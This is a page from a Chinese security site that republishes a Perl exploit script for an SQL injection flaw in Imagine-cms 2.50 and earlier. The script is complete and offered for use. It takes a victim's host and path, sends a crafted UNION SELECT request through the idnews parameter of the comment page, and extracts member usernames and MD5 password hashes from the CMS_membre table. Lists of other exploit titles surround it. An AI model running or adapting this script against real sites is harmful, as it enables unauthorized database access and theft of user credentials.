首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Imagine-cms <= 2.50 SQL Injection Exploit Vulnerability 来源：http://metropolis.fr.cr 作者：Metropolis 发布时间：2010-07-22   #!/usr/bin/perl ########################################### # # Script Name : Imagine-cms 2.50 # # Version :  2.50 # # Bug Type : SQL Injection # # Found by : Metropolis # # Home : http://metropolis.fr.cr # # Discovered : 21/07/2010 # # Download app : # http://www.imagine-cms.net/modules/ # telechargement/index.php?page=afficher_souscat&id_cat=2 # ########################################### use IO::Socket; if(@ARGV != 2) { usage(); } else { exploit(); } sub header() {   print "\n- Author: Metropolis\r\n";   print "- Imagine-cms <= 2.50 Remote SQL Injection Exploit\r\n"; } sub usage() {   header();   print "- Usage: $0 <host> <path>\r\n";   print "- <host> -> Victim's host ex: www.victim.com\r\n";   print "- <path> -> ex: /\r\n";   exit(); } sub exploit () {   #Our variables...   $spserver = $ARGV[0];   $spserver =~ s/(http:\/\/)//eg;   $sphost   = "http://".$spserver;   $spdir    = $ARGV[1];   $spport   = "80";   $sptar    = "index.php?page=commentaire&idnews=";   $spxp     = "-1+and+1=0+union+select+1,2,concat(25552,membre_pseudo,25553,membre_mdp,25554),4,5+from+CMS_membre--";   $spreq    = $sphost.$spdir.$sptar.$spxp;   #Sending data...   header();   print "- Trying to connect: $spserver\r\n";   $sp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$spserver", PeerPort => "$spport") || die "- Connection failed...\n";   print $sp "GET $spreq HTTP/1.1\n";   print $sp "Accept: */*\n";   print $sp "Referer: $sphost\n";   print $sp "Accept-Language: tr\n";   print $sp "User-Agent: NukeZilla\n";   print $sp "Cache-Control: no-cache\n";   print $sp "Host: $spserver\n";   print $sp "Connection: close\n\n";   print "- Connected...\r\n";   while ($answer = <$sp>) {     if ($answer =~ /25552(.*?)25553([\d,a-f]{32})25554/) {       print "- Exploit succeed!\r\n";       print "- Username: $1\r\n";       print "- MD5 HASH of PASSWORD: $2\r\n";       exit();     }   }   #Exploit failed...   print "- Exploit failed\n" }     [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SapGUI BI v7100.1.400.8 Heap C ·QQPlayer asx File Processing B ·Lithtech Engine Memory Corrupt ·QQPlayer cue File Buffer Overf ·libpng <= 1.4.2 Denial of Serv ·ZipCentral (.zip) Buffer Overf ·SapGUI BI v7100.1.400.8 Heap C ·Multiple Web Browser Clickjack ·Unreal Tournament 3 2.1 'STEAM ·Easy FTP Server v1.7.0.11 LIST ·IE 7.0 - DoS Microsoft Clip Or ·Ubuntu 10.04 LTS - Lucid Lynx   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved